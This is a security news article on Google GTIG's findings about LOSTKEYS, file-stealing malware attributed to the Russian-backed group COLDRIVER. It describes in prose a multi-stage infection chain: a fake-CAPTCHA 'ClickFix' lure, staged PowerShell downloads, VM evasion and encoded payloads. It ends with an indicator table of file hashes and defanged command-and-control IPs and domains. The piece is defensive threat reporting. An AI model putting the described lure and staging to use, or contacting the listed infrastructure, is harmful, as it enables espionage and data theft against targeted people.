The Google Threat Intelligence Group (GTIG) has uncovered a sophisticated new malware dubbed LOSTKEYS, attributed to the Russian government-backed threat actor COLDRIVER, also known as UNC4057, Star Blizzard, and Callisto.
Active since at least December 2023, with significant campaigns observed in January, March, and April 2025, LOSTKEYS represents a notable evolution in COLDRIVER’s toolkit, which has historically focused on credential phishing against high-value targets such as NATO governments, NGOs, journalists, think tanks, and former intelligence officers.
This malware is designed to exfiltrate files from specific extensions and directories, alongside harvesting system information and running processes, posing a severe threat to targeted individuals and organizations, particularly those linked to Ukraine or Western governments.
.png
)
GTIG notes that COLDRIVER’s primary objective appears to be intelligence collection aligned with Russia’s strategic interests, occasionally escalating to hack-and-leak operations, as seen in past campaigns targeting UK officials and NGOs.
Multi-Stage Infection Chain Evades Detection
The deployment of LOSTKEYS follows a complex, multi-stage infection chain that begins with a deceptive lure-a fake CAPTCHA on a malicious website.
Once a user “verifies” the CAPTCHA, PowerShell code is copied to their clipboard, and they are prompted to execute it via the Windows “Run” dialog, a technique known as “ClickFix” often used by advanced persistent threats (APTs) and financially motivated actors.
The initial PowerShell script fetches a second-stage payload from a hardcoded IP (165.227.148[.]68), which employs device evasion tactics by calculating the MD5 hash of the display resolution to halt execution on virtual machines (VMs) if specific values are detected.
Subsequent stages involve retrieving Base64-encoded PowerShell scripts and a Visual Basic Script (VBS) decoder, using unique substitution cipher keys per infection chain to decode the final LOSTKEYS payload.
This intricate process underscores COLDRIVER’s efforts to evade detection and analysis, ensuring the malware is deployed only to select, high-value targets.
GTIG also identified older LOSTKEYS samples from December 2023, disguised as Portable Executable (PE) files mimicking the Maltego software, though their direct link to COLDRIVER remains under investigation.
To counter such threats, Google has integrated findings into Safe Browsing, issued government-backed attacker alerts to at-risk Gmail and Workspace users, and recommends enabling Enhanced Safe Browsing in Chrome alongside regular device updates.
Indicators of Compromise (IOCs)
| Description | Indicator |
|---|---|
| Stage 1 – Fake CAPTCHA PowerShell | 13f7599c94b9d4b028ce02397717a128 |
| Stage 2 – Device Evasion | 4c7accba35edd646584bb5a40ab78f96 |
| Stage 3 – Payload Retrieval Key | 6b85d707c23d68f9518e757cc97adb20 |
| Decoder Script Key | 3233668d2e4a80b17e6357177b53539d |
| Final Payload (Encoded) | 6bc411d562456079a8f1e38f3473c33a |
| Final Payload (Decoded) | 28a0596b9c62b7b7aca9cac2a07b0671 |
| C2 Server IP | 165.227.148[.]68 |
| C2 Domain | cloudmediaportal[.]com |
| C2 Domain (Dec 2023) | njala[.]dev |
| C2 IP (Dec 2023) | 80.66.88[.]67 |
Setting Up SOC Team? – Download Free Ultimate SIEM Pricing Guide (PDF) For Your SOC Team -> Free Download
